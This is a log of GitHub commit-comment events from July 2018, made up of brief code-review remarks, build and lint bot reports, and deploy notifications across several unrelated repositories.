{"id":"7989471805","type":"CommitCommentEvent","actor":{"login":"p51i"},"repo":{"name":"UI-Research/next50"},"payload":{"comment":{"id":29765302,"position":null,"line":null,"path":null,"commit_id":"8473d990e65f712b8d76ec30d7ebe21edc8c7438","created_at":"2018-07-19T14:18:08Z","updated_at":"2018-07-19T14:18:08Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [next50#ci-93](https://dashboard.pantheon.io/sites/8e7c33cd-c6bd-4dcf-a71d-f1ade4f2e791#ci-93).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-93-next50.pantheonsite.io/)"}},"created_at":"2018-07-19T14:18:08Z"}
{"id":"7989476058","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"dwk5/ror_edu"},"payload":{"comment":{"id":29765310,"position":9,"line":9,"path":"triangle_square.rb","commit_id":"3cce79407935bb95a77141b924cc553911dcadfb","created_at":"2018-07-19T14:18:46Z","updated_at":"2018-07-19T14:18:46Z","author_association":"NONE","body":"Приведение типов лучше делать при получени, а не при использовании"}},"created_at":"2018-07-19T14:18:46Z"}
{"id":"7989477874","type":"CommitCommentEvent","actor":{"login":"askmike"},"repo":{"name":"askmike/gekko"},"payload":{"comment":{"id":29765313,"position":100,"line":51,"path":"test/candleBatcher.js","commit_id":"b5f2e0cf31e99afa88f160eed404528f081c6ee3","created_at":"2018-07-19T14:19:00Z","updated_at":"2018-07-19T14:19:00Z","author_association":"OWNER","body":"Great point! Note that this test was written before flush was introduced\n(and when it was I failed to update this test). Feel free to create a PR :)\n\nOn Thu, Jul 19, 2018 at 7:22 PM, Pankaj Goyal <notifications@github.com>\nwrote:\n\n> although it works, there should be a cb.flush() call after the\n> write(candle) call\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/askmike/gekko/commit/b5f2e0cf31e99afa88f160eed404528f081c6ee3#commitcomment-29762937>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AA7MD6qmaHi8KrXO0oDoS_F5x6tpHFKoks5uIGwNgaJpZM4VWOLx>\n> .\n>\n\n\n\n-- \nPGP key at keybase.io/mikevanrossum\n<https://keybase.io/mikevanrossum/key.asc>\n"}},"created_at":"2018-07-19T14:19:00Z"}
{"id":"7989480240","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"dwk5/ror_edu"},"payload":{"comment":{"id":29765318,"position":9,"line":9,"path":"triangle_square.rb","commit_id":"3cce79407935bb95a77141b924cc553911dcadfb","created_at":"2018-07-19T14:19:23Z","updated_at":"2018-07-19T14:19:23Z","author_association":"NONE","body":"И лучше для читаемости вынести вычисления в переменную и использовать ее внутри интерполяции."}},"created_at":"2018-07-19T14:19:23Z"}
{"id":"7989481884","type":"CommitCommentEvent","actor":{"login":"luca020400"},"repo":{"name":"luca020400/android_kernel_oneplus_sdm845"},"payload":{"comment":{"id":29765323,"position":9,"line":1424,"path":"drivers/gpu/drm/msm/dsi-staging/dsi_panel.c","commit_id":"45d46cb99c5235998080fe307c262e4559a791d3","created_at":"2018-07-19T14:19:38Z","updated_at":"2018-07-19T14:19:38Z","author_association":"OWNER","body":"maybe just call it mode-odd?"}},"created_at":"2018-07-19T14:19:38Z"}
{"id":"7989484563","type":"CommitCommentEvent","actor":{"login":"ArahmanAsad"},"repo":{"name":"ArahmanAsad/pa-quizzler"},"payload":{"comment":{"id":29765327,"position":null,"line":null,"path":null,"commit_id":"74eeefafc9f184b6a0fc13fe3d6dc263d7591b42","created_at":"2018-07-19T14:20:04Z","updated_at":"2018-07-19T14:20:04Z","author_association":"OWNER","body":"n"}},"created_at":"2018-07-19T14:20:04Z"}
{"id":"7989486685","type":"CommitCommentEvent","actor":{"login":"winsvega"},"repo":{"name":"ewasm/tests"},"payload":{"comment":{"id":29765333,"position":6,"line":6,"path":"GeneralStateTests/stEWASMTests/unreachable.json","commit_id":"cc4c031c24306e7d97c8d020c5fd7705d055ea2b","created_at":"2018-07-19T14:20:24Z","updated_at":"2018-07-19T14:20:24Z","author_association":"NONE","body":"should we now also add ewasm parser version here ?  "}},"created_at":"2018-07-19T14:20:24Z"}
{"id":"7989488264","type":"CommitCommentEvent","actor":{"login":"xiaoqi31825"},"repo":{"name":"xiaoqi31825/1213"},"payload":{"comment":{"id":29765337,"position":87,"line":87,"path":".gitignore","commit_id":"d4d25f31b2735f353c0bb515bff78bfe9014f769","created_at":"2018-07-19T14:20:37Z","updated_at":"2018-07-19T14:20:37Z","author_association":"OWNER","body":"fdf f df"}},"created_at":"2018-07-19T14:20:37Z"}
{"id":"7989498886","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zold-io/java-api"},"payload":{"comment":{"id":29765352,"position":null,"line":null,"path":null,"commit_id":"e7bf16247075ec2bb23081b61e1835fa44551621","created_at":"2018-07-19T14:22:17Z","updated_at":"2018-07-19T14:22:17Z","author_association":"COLLABORATOR","body":"Puzzle `5-38f68f69` discovered in   [`src/test/java/io/zold/api/NetworkTest.java`](  https://github.com/zold-io/java-api/blob/master/src/test/java/io/zold/api/NetworkTest.java)   and submitted as #38. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-19T14:22:17Z"}
{"id":"7989499164","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zold-io/java-api"},"payload":{"comment":{"id":29765354,"position":null,"line":null,"path":null,"commit_id":"e7bf16247075ec2bb23081b61e1835fa44551621","created_at":"2018-07-19T14:22:19Z","updated_at":"2018-07-19T14:22:19Z","author_association":"COLLABORATOR","body":"Puzzle `5-fd3c6d54` discovered in   [`src/main/java/io/zold/api/RtNetwork.java`](  https://github.com/zold-io/java-api/blob/master/src/main/java/io/zold/api/RtNetwork.java)   and submitted as #39. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-19T14:22:19Z"}
{"id":"7989499557","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zold-io/java-api"},"payload":{"comment":{"id":29765355,"position":null,"line":null,"path":null,"commit_id":"e7bf16247075ec2bb23081b61e1835fa44551621","created_at":"2018-07-19T14:22:23Z","updated_at":"2018-07-19T14:22:23Z","author_association":"COLLABORATOR","body":"Puzzle `5-c56bb757` discovered in   [`src/main/java/io/zold/api/RtNetwork.java`](  https://github.com/zold-io/java-api/blob/master/src/main/java/io/zold/api/RtNetwork.java)   and submitted as #40. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-19T14:22:23Z"}
{"id":"7989499828","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zold-io/java-api"},"payload":{"comment":{"id":29765357,"position":null,"line":null,"path":null,"commit_id":"e7bf16247075ec2bb23081b61e1835fa44551621","created_at":"2018-07-19T14:22:25Z","updated_at":"2018-07-19T14:22:25Z","author_association":"COLLABORATOR","body":"Puzzle `5-dec07794` discovered in   [`src/main/java/io/zold/api/RtNetwork.java`](  https://github.com/zold-io/java-api/blob/master/src/main/java/io/zold/api/RtNetwork.java)   and submitted as #41. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-19T14:22:25Z"}
{"id":"7989499831","type":"CommitCommentEvent","actor":{"login":"HansBrende"},"repo":{"name":"jsonld-java/jsonld-java"},"payload":{"comment":{"id":29765358,"position":3,"line":42,"path":"pom.xml","commit_id":"d801ed537a19a007de2e09e6b13b9a7fc28f1344","created_at":"2018-07-19T14:22:25Z","updated_at":"2018-07-19T14:22:25Z","author_association":"CONTRIBUTOR","body":"`httpclient` can be bumped to 4.5.6."}},"created_at":"2018-07-19T14:22:25Z"}
{"id":"7989503508","type":"CommitCommentEvent","actor":{"login":"allejo"},"repo":{"name":"allejo/highlight.php"},"payload":{"comment":{"id":29765364,"position":null,"line":null,"path":null,"commit_id":"c593c33c89f8da6a48ed6a97f8a02b78b379b455","created_at":"2018-07-19T14:22:58Z","updated_at":"2018-07-19T14:22:58Z","author_association":"OWNER","body":"https://www.diffchecker.com/Ct0gIjN3"}},"created_at":"2018-07-19T14:22:58Z"}
{"id":"7989506822","type":"CommitCommentEvent","actor":{"login":"tamsen"},"repo":{"name":"bcbio/bcbio-nextgen"},"payload":{"comment":{"id":29765373,"position":null,"line":null,"path":null,"commit_id":"49d0cbb1f6dcbea629c63749e2f9813bd06dcee3","created_at":"2018-07-19T14:23:29Z","updated_at":"2018-07-19T14:23:29Z","author_association":"NONE","body":"Great! We're still recommending -RMxNFilter 5,9,0.35 on the command line to filter FP indels .  Sorry its not default yet.\r\n\r\nhttps://github.com/Illumina/Pisces/wiki/Pisces-Quick-Start-5.2.7"}},"created_at":"2018-07-19T14:23:29Z"}
{"id":"7989510136","type":"CommitCommentEvent","actor":{"login":"zarechenskiy"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29765382,"position":16,"line":76,"path":"compiler/frontend/src/org/jetbrains/kotlin/descriptors/annotations/AnnotationSplitter.kt","commit_id":"eb0faac4b30f179bfeb0168996efe6ded8cca668","created_at":"2018-07-19T14:23:59Z","updated_at":"2018-07-19T14:23:59Z","author_association":"MEMBER","body":"Also `SETTER_PARAMETER`?"}},"created_at":"2018-07-19T14:23:59Z"}
{"id":"7989552430","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"jackwasey/physiology"},"payload":{"comment":{"id":29765469,"position":null,"line":null,"path":null,"commit_id":"ca6bd4bb345089ec43c4d3e50336a63fe91c48c1","created_at":"2018-07-19T14:30:27Z","updated_at":"2018-07-19T14:30:27Z","author_association":"NONE","body":"[R/bmi.R:14:3:](https://github.com/jackwasey/physiology/blob/ca6bd4bb345089ec43c4d3e50336a63fe91c48c1/R/bmi.R#L14) *warning:* **no visible global function definition for ‘valid_height_adult’**\n```r\n​  valid_height_adult(height_m, ...)\n  ^~~~~~~~~~~~~~~~~~\n```\n[R/bmi.R:15:3:](https://github.com/jackwasey/physiology/blob/ca6bd4bb345089ec43c4d3e50336a63fe91c48c1/R/bmi.R#L15) *warning:* **no visible global function definition for ‘valid_weight_adult’**\n```r\n​  valid_weight_adult(weight_kg, ...)\n  ^~~~~~~~~~~~~~~~~~\n```\n[R/bmi.R:83:7:](https://github.com/jackwasey/physiology/blob/ca6bd4bb345089ec43c4d3e50336a63fe91c48c1/R/bmi.R#L83) *warning:* **no visible global function definition for ‘valid_height’**\n```r\n​      valid_height(height_m, ...)\n      ^~~~~~~~~~~~\n```\n[R/bmi.R:132:3:](https://github.com/jackwasey/physiology/blob/ca6bd4bb345089ec43c4d3e50336a63fe91c48c1/R/bmi.R#L132) *warning:* **no visible global function definition for ‘valid_height’**\n```r\n​  valid_height(height_m, ...)\n  ^~~~~~~~~~~~\n```\n[R/bmi.R:156:3:](https://github.com/jackwasey/physiology/blob/ca6bd4bb345089ec43c4d3e50336a63fe91c48c1/R/bmi.R#L156) *warning:* **no visible global function definition for ‘valid_height’**\n```r\n​  valid_height(height_m, ...)\n  ^~~~~~~~~~~~\n```\n[R/bmi.R:181:3:](https://github.com/jackwasey/physiology/blob/ca6bd4bb345089ec43c4d3e50336a63fe91c48c1/R/bmi.R#L181) *warning:* **no visible global function definition for ‘valid_height’**\n```r\n​  valid_height(height_m, ...)\n  ^~~~~~~~~~~~\n```\n[R/bmi.R:182:3:](https://github.com/jackwasey/physiology/blob/ca6bd4bb345089ec43c4d3e50336a63fe91c48c1/R/bmi.R#L182) *warning:* **no visible global function definition for ‘valid_weight’**\n```r\n​  valid_weight(weight_kg, ...)\n  ^~~~~~~~~~~~\n```\n[R/bmi.R:204:15:](https://github.com/jackwasey/physiology/blob/ca6bd4bb345089ec43c4d3e50336a63fe91c48c1/R/bmi.R#L204) *warning:* **no visible global function definition for ‘blood_vol_Lemmens_indexed’**\n```r\n​  weight_kg * blood_vol_Lemmens_indexed(height_m, weight_kg, ...)\n              ^~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/bmi.R:214:3:](https://github.com/jackwasey/physiology/blob/ca6bd4bb345089ec43c4d3e50336a63fe91c48c1/R/bmi.R#L214) *warning:* **no visible global function definition for ‘valid_height_adult’**\n```r\n​  valid_height_adult(height_m, ...)\n  ^~~~~~~~~~~~~~~~~~\n```\n[R/bmi.R:215:3:](https://github.com/jackwasey/physiology/blob/ca6bd4bb345089ec43c4d3e50336a63fe91c48c1/R/bmi.R#L215) *warning:* **no visible global function definition for ‘valid_weight_adult’**\n```r\n​  valid_weight_adult(weight_kg, ...)\n  ^~~~~~~~~~~~~~~~~~\n```\n[R/bmi.R:238:3:](https://github.com/jackwasey/physiology/blob/ca6bd4bb345089ec43c4d3e50336a63fe91c48c1/R/bmi.R#L238) *warning:* **no visible global function definition for ‘valid_weight_adult’**\n```r\n​  valid_weight_adult(weight_kg, ...)\n  ^~~~~~~~~~~~~~~~~~\n```\n[R/bmi.R:239:3:](https://github.com/jackwasey/physiology/blob/ca6bd4bb345089ec43c4d3e50336a63fe91c48c1/R/bmi.R#L239) *warning:* **no visible global function definition for ‘valid_age_adult’**\n```r\n​  valid_age_adult(age_y, ...)\n  ^~~~~~~~~~~~~~~\n```\n[R/bmi.R:260:3:](https://github.com/jackwasey/physiology/blob/ca6bd4bb345089ec43c4d3e50336a63fe91c48c1/R/bmi.R#L260) *warning:* **no visible global function definition for ‘valid_height_adult’**\n```r\n​  valid_height_adult(height_m, ...)\n  ^~~~~~~~~~~~~~~~~~\n```\n[R/bmi.R:261:3:](https://github.com/jackwasey/physiology/blob/ca6bd4bb345089ec43c4d3e50336a63fe91c48c1/R/bmi.R#L261) *warning:* **no visible global function definition for ‘valid_weight_adult’**\n```r\n​  valid_weight_adult(weight_kg, ...)\n  ^~~~~~~~~~~~~~~~~~\n```\n[R/bmi.R:264:9:](https://github.com/jackwasey/physiology/blob/ca6bd4bb345089ec43c4d3e50336a63fe91c48c1/R/bmi.R#L264) *warning:* **no visible global function definition for ‘ideal_weight_adult’**\n```r\n​  0.6 * ideal_weight_adult(height_m, male) + 0.4 * weight_kg\n        ^~~~~~~~~~~~~~~~~~\n```\n[R/bmi.R:280:3:](https://github.com/jackwasey/physiology/blob/ca6bd4bb345089ec43c4d3e50336a63fe91c48c1/R/bmi.R#L280) *warning:* **no visible global function definition for ‘valid_height_adult’**\n```r\n​  valid_height_adult(height_m, ...)\n  ^~~~~~~~~~~~~~~~~~\n```\n[R/bmi.R:281:3:](https://github.com/jackwasey/physiology/blob/ca6bd4bb345089ec43c4d3e50336a63fe91c48c1/R/bmi.R#L281) *warning:* **no visible global function definition for ‘valid_weight_adult’**\n```r\n​  valid_weight_adult(weight_kg, ...)\n  ^~~~~~~~~~~~~~~~~~\n```\n[R/bmi.R:292:3:](https://github.com/jackwasey/physiology/blob/ca6bd4bb345089ec43c4d3e50336a63fe91c48c1/R/bmi.R#L292) *warning:* **no visible global function definition for ‘bmi_adult’**\n```r\n​  bmi_adult(heightin * 0.0254, weightlb / 2.2046224, ...)\n  ^~~~~~~~~\n```"}},"created_at":"2018-07-19T14:30:27Z"}
{"id":"7989552620","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29765471,"position":null,"line":null,"path":null,"commit_id":"211f6d675eb46d0db995370046ac66c541a48378","created_at":"2018-07-19T14:30:29Z","updated_at":"2018-07-19T14:30:29Z","author_association":"NONE","body":"#6517-MissingEqNumRefsInEngrgRef (RKStrand) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2321 of 2322 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 627\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-211f6d675eb46d0db995370046ac66c541a48378-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-211f6d675eb46d0db995370046ac66c541a48378-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-211f6d675eb46d0db995370046ac66c541a48378-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.18%25-green.png)</a>\n"}},"created_at":"2018-07-19T14:30:29Z"}
{"id":"7989554191","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"jackwasey/physiology"},"payload":{"comment":{"id":29765474,"position":null,"line":null,"path":null,"commit_id":"ca6bd4bb345089ec43c4d3e50336a63fe91c48c1","created_at":"2018-07-19T14:30:43Z","updated_at":"2018-07-19T14:30:43Z","author_association":"NONE","body":"[R/bmi.R:14:3:](https://github.com/jackwasey/physiology/blob/ca6bd4bb345089ec43c4d3e50336a63fe91c48c1/R/bmi.R#L14) *warning:* **no visible global function definition for ‘valid_height_adult’**\n```r\n​  valid_height_adult(height_m, ...)\n  ^~~~~~~~~~~~~~~~~~\n```\n[R/bmi.R:15:3:](https://github.com/jackwasey/physiology/blob/ca6bd4bb345089ec43c4d3e50336a63fe91c48c1/R/bmi.R#L15) *warning:* **no visible global function definition for ‘valid_weight_adult’**\n```r\n​  valid_weight_adult(weight_kg, ...)\n  ^~~~~~~~~~~~~~~~~~\n```\n[R/bmi.R:83:7:](https://github.com/jackwasey/physiology/blob/ca6bd4bb345089ec43c4d3e50336a63fe91c48c1/R/bmi.R#L83) *warning:* **no visible global function definition for ‘valid_height’**\n```r\n​      valid_height(height_m, ...)\n      ^~~~~~~~~~~~\n```\n[R/bmi.R:132:3:](https://github.com/jackwasey/physiology/blob/ca6bd4bb345089ec43c4d3e50336a63fe91c48c1/R/bmi.R#L132) *warning:* **no visible global function definition for ‘valid_height’**\n```r\n​  valid_height(height_m, ...)\n  ^~~~~~~~~~~~\n```\n[R/bmi.R:156:3:](https://github.com/jackwasey/physiology/blob/ca6bd4bb345089ec43c4d3e50336a63fe91c48c1/R/bmi.R#L156) *warning:* **no visible global function definition for ‘valid_height’**\n```r\n​  valid_height(height_m, ...)\n  ^~~~~~~~~~~~\n```\n[R/bmi.R:181:3:](https://github.com/jackwasey/physiology/blob/ca6bd4bb345089ec43c4d3e50336a63fe91c48c1/R/bmi.R#L181) *warning:* **no visible global function definition for ‘valid_height’**\n```r\n​  valid_height(height_m, ...)\n  ^~~~~~~~~~~~\n```\n[R/bmi.R:182:3:](https://github.com/jackwasey/physiology/blob/ca6bd4bb345089ec43c4d3e50336a63fe91c48c1/R/bmi.R#L182) *warning:* **no visible global function definition for ‘valid_weight’**\n```r\n​  valid_weight(weight_kg, ...)\n  ^~~~~~~~~~~~\n```\n[R/bmi.R:204:15:](https://github.com/jackwasey/physiology/blob/ca6bd4bb345089ec43c4d3e50336a63fe91c48c1/R/bmi.R#L204) *warning:* **no visible global function definition for ‘blood_vol_Lemmens_indexed’**\n```r\n​  weight_kg * blood_vol_Lemmens_indexed(height_m, weight_kg, ...)\n              ^~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/bmi.R:214:3:](https://github.com/jackwasey/physiology/blob/ca6bd4bb345089ec43c4d3e50336a63fe91c48c1/R/bmi.R#L214) *warning:* **no visible global function definition for ‘valid_height_adult’**\n```r\n​  valid_height_adult(height_m, ...)\n  ^~~~~~~~~~~~~~~~~~\n```\n[R/bmi.R:215:3:](https://github.com/jackwasey/physiology/blob/ca6bd4bb345089ec43c4d3e50336a63fe91c48c1/R/bmi.R#L215) *warning:* **no visible global function definition for ‘valid_weight_adult’**\n```r\n​  valid_weight_adult(weight_kg, ...)\n  ^~~~~~~~~~~~~~~~~~\n```\n[R/bmi.R:238:3:](https://github.com/jackwasey/physiology/blob/ca6bd4bb345089ec43c4d3e50336a63fe91c48c1/R/bmi.R#L238) *warning:* **no visible global function definition for ‘valid_weight_adult’**\n```r\n​  valid_weight_adult(weight_kg, ...)\n  ^~~~~~~~~~~~~~~~~~\n```\n[R/bmi.R:239:3:](https://github.com/jackwasey/physiology/blob/ca6bd4bb345089ec43c4d3e50336a63fe91c48c1/R/bmi.R#L239) *warning:* **no visible global function definition for ‘valid_age_adult’**\n```r\n​  valid_age_adult(age_y, ...)\n  ^~~~~~~~~~~~~~~\n```\n[R/bmi.R:260:3:](https://github.com/jackwasey/physiology/blob/ca6bd4bb345089ec43c4d3e50336a63fe91c48c1/R/bmi.R#L260) *warning:* **no visible global function definition for ‘valid_height_adult’**\n```r\n​  valid_height_adult(height_m, ...)\n  ^~~~~~~~~~~~~~~~~~\n```\n[R/bmi.R:261:3:](https://github.com/jackwasey/physiology/blob/ca6bd4bb345089ec43c4d3e50336a63fe91c48c1/R/bmi.R#L261) *warning:* **no visible global function definition for ‘valid_weight_adult’**\n```r\n​  valid_weight_adult(weight_kg, ...)\n  ^~~~~~~~~~~~~~~~~~\n```\n[R/bmi.R:264:9:](https://github.com/jackwasey/physiology/blob/ca6bd4bb345089ec43c4d3e50336a63fe91c48c1/R/bmi.R#L264) *warning:* **no visible global function definition for ‘ideal_weight_adult’**\n```r\n​  0.6 * ideal_weight_adult(height_m, male) + 0.4 * weight_kg\n        ^~~~~~~~~~~~~~~~~~\n```\n[R/bmi.R:280:3:](https://github.com/jackwasey/physiology/blob/ca6bd4bb345089ec43c4d3e50336a63fe91c48c1/R/bmi.R#L280) *warning:* **no visible global function definition for ‘valid_height_adult’**\n```r\n​  valid_height_adult(height_m, ...)\n  ^~~~~~~~~~~~~~~~~~\n```\n[R/bmi.R:281:3:](https://github.com/jackwasey/physiology/blob/ca6bd4bb345089ec43c4d3e50336a63fe91c48c1/R/bmi.R#L281) *warning:* **no visible global function definition for ‘valid_weight_adult’**\n```r\n​  valid_weight_adult(weight_kg, ...)\n  ^~~~~~~~~~~~~~~~~~\n```\n[R/bmi.R:292:3:](https://github.com/jackwasey/physiology/blob/ca6bd4bb345089ec43c4d3e50336a63fe91c48c1/R/bmi.R#L292) *warning:* **no visible global function definition for ‘bmi_adult’**\n```r\n​  bmi_adult(heightin * 0.0254, weightlb / 2.2046224, ...)\n  ^~~~~~~~~\n```"}},"created_at":"2018-07-19T14:30:43Z"}
{"id":"7989556735","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"jackwasey/physiology"},"payload":{"comment":{"id":29765482,"position":null,"line":null,"path":null,"commit_id":"ca6bd4bb345089ec43c4d3e50336a63fe91c48c1","created_at":"2018-07-19T14:31:06Z","updated_at":"2018-07-19T14:31:06Z","author_association":"NONE","body":"[R/bmi.R:14:3:](https://github.com/jackwasey/physiology/blob/ca6bd4bb345089ec43c4d3e50336a63fe91c48c1/R/bmi.R#L14) *warning:* **no visible global function definition for ‘valid_height_adult’**\n```r\n​  valid_height_adult(height_m, ...)\n  ^~~~~~~~~~~~~~~~~~\n```\n[R/bmi.R:15:3:](https://github.com/jackwasey/physiology/blob/ca6bd4bb345089ec43c4d3e50336a63fe91c48c1/R/bmi.R#L15) *warning:* **no visible global function definition for ‘valid_weight_adult’**\n```r\n​  valid_weight_adult(weight_kg, ...)\n  ^~~~~~~~~~~~~~~~~~\n```\n[R/bmi.R:83:7:](https://github.com/jackwasey/physiology/blob/ca6bd4bb345089ec43c4d3e50336a63fe91c48c1/R/bmi.R#L83) *warning:* **no visible global function definition for ‘valid_height’**\n```r\n​      valid_height(height_m, ...)\n      ^~~~~~~~~~~~\n```\n[R/bmi.R:132:3:](https://github.com/jackwasey/physiology/blob/ca6bd4bb345089ec43c4d3e50336a63fe91c48c1/R/bmi.R#L132) *warning:* **no visible global function definition for ‘valid_height’**\n```r\n​  valid_height(height_m, ...)\n  ^~~~~~~~~~~~\n```\n[R/bmi.R:156:3:](https://github.com/jackwasey/physiology/blob/ca6bd4bb345089ec43c4d3e50336a63fe91c48c1/R/bmi.R#L156) *warning:* **no visible global function definition for ‘valid_height’**\n```r\n​  valid_height(height_m, ...)\n  ^~~~~~~~~~~~\n```\n[R/bmi.R:181:3:](https://github.com/jackwasey/physiology/blob/ca6bd4bb345089ec43c4d3e50336a63fe91c48c1/R/bmi.R#L181) *warning:* **no visible global function definition for ‘valid_height’**\n```r\n​  valid_height(height_m, ...)\n  ^~~~~~~~~~~~\n```\n[R/bmi.R:182:3:](https://github.com/jackwasey/physiology/blob/ca6bd4bb345089ec43c4d3e50336a63fe91c48c1/R/bmi.R#L182) *warning:* **no visible global function definition for ‘valid_weight’**\n```r\n​  valid_weight(weight_kg, ...)\n  ^~~~~~~~~~~~\n```\n[R/bmi.R:204:15:](https://github.com/jackwasey/physiology/blob/ca6bd4bb345089ec43c4d3e50336a63fe91c48c1/R/bmi.R#L204) *warning:* **no visible global function definition for ‘blood_vol_Lemmens_indexed’**\n```r\n​  weight_kg * blood_vol_Lemmens_indexed(height_m, weight_kg, ...)\n              ^~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/bmi.R:214:3:](https://github.com/jackwasey/physiology/blob/ca6bd4bb345089ec43c4d3e50336a63fe91c48c1/R/bmi.R#L214) *warning:* **no visible global function definition for ‘valid_height_adult’**\n```r\n​  valid_height_adult(height_m, ...)\n  ^~~~~~~~~~~~~~~~~~\n```\n[R/bmi.R:215:3:](https://github.com/jackwasey/physiology/blob/ca6bd4bb345089ec43c4d3e50336a63fe91c48c1/R/bmi.R#L215) *warning:* **no visible global function definition for ‘valid_weight_adult’**\n```r\n​  valid_weight_adult(weight_kg, ...)\n  ^~~~~~~~~~~~~~~~~~\n```\n[R/bmi.R:238:3:](https://github.com/jackwasey/physiology/blob/ca6bd4bb345089ec43c4d3e50336a63fe91c48c1/R/bmi.R#L238) *warning:* **no visible global function definition for ‘valid_weight_adult’**\n```r\n​  valid_weight_adult(weight_kg, ...)\n  ^~~~~~~~~~~~~~~~~~\n```\n[R/bmi.R:239:3:](https://github.com/jackwasey/physiology/blob/ca6bd4bb345089ec43c4d3e50336a63fe91c48c1/R/bmi.R#L239) *warning:* **no visible global function definition for ‘valid_age_adult’**\n```r\n​  valid_age_adult(age_y, ...)\n  ^~~~~~~~~~~~~~~\n```\n[R/bmi.R:260:3:](https://github.com/jackwasey/physiology/blob/ca6bd4bb345089ec43c4d3e50336a63fe91c48c1/R/bmi.R#L260) *warning:* **no visible global function definition for ‘valid_height_adult’**\n```r\n​  valid_height_adult(height_m, ...)\n  ^~~~~~~~~~~~~~~~~~\n```\n[R/bmi.R:261:3:](https://github.com/jackwasey/physiology/blob/ca6bd4bb345089ec43c4d3e50336a63fe91c48c1/R/bmi.R#L261) *warning:* **no visible global function definition for ‘valid_weight_adult’**\n```r\n​  valid_weight_adult(weight_kg, ...)\n  ^~~~~~~~~~~~~~~~~~\n```\n[R/bmi.R:264:9:](https://github.com/jackwasey/physiology/blob/ca6bd4bb345089ec43c4d3e50336a63fe91c48c1/R/bmi.R#L264) *warning:* **no visible global function definition for ‘ideal_weight_adult’**\n```r\n​  0.6 * ideal_weight_adult(height_m, male) + 0.4 * weight_kg\n        ^~~~~~~~~~~~~~~~~~\n```\n[R/bmi.R:280:3:](https://github.com/jackwasey/physiology/blob/ca6bd4bb345089ec43c4d3e50336a63fe91c48c1/R/bmi.R#L280) *warning:* **no visible global function definition for ‘valid_height_adult’**\n```r\n​  valid_height_adult(height_m, ...)\n  ^~~~~~~~~~~~~~~~~~\n```\n[R/bmi.R:281:3:](https://github.com/jackwasey/physiology/blob/ca6bd4bb345089ec43c4d3e50336a63fe91c48c1/R/bmi.R#L281) *warning:* **no visible global function definition for ‘valid_weight_adult’**\n```r\n​  valid_weight_adult(weight_kg, ...)\n  ^~~~~~~~~~~~~~~~~~\n```\n[R/bmi.R:292:3:](https://github.com/jackwasey/physiology/blob/ca6bd4bb345089ec43c4d3e50336a63fe91c48c1/R/bmi.R#L292) *warning:* **no visible global function definition for ‘bmi_adult’**\n```r\n​  bmi_adult(heightin * 0.0254, weightlb / 2.2046224, ...)\n  ^~~~~~~~~\n```"}},"created_at":"2018-07-19T14:31:06Z"}
{"id":"7989560405","type":"CommitCommentEvent","actor":{"login":"matty234"},"repo":{"name":"Alex-CD/Civ5-Extended"},"payload":{"comment":{"id":29765485,"position":null,"line":null,"path":null,"commit_id":"6d45c2ee31adc60793d08b5aa34e814c31f4f257","created_at":"2018-07-19T14:31:39Z","updated_at":"2018-07-19T14:31:39Z","author_association":"NONE","body":"Yes"}},"created_at":"2018-07-19T14:31:39Z"}
{"id":"7989560679","type":"CommitCommentEvent","actor":{"login":"samridler"},"repo":{"name":"samridler/JEMSS.jl"},"payload":{"comment":{"id":29765486,"position":6,"line":193,"path":"src/animation/animation.jl","commit_id":"cd715f7fe71a95ed6bd18ac8802ad237aa19aec5","created_at":"2018-07-19T14:31:42Z","updated_at":"2018-07-19T14:31:42Z","author_association":"OWNER","body":"Should instead be:\r\n`id = isempty(animConnections) ? 1 : maximum(keys(animConnections)) + 1`"}},"created_at":"2018-07-19T14:31:42Z"}
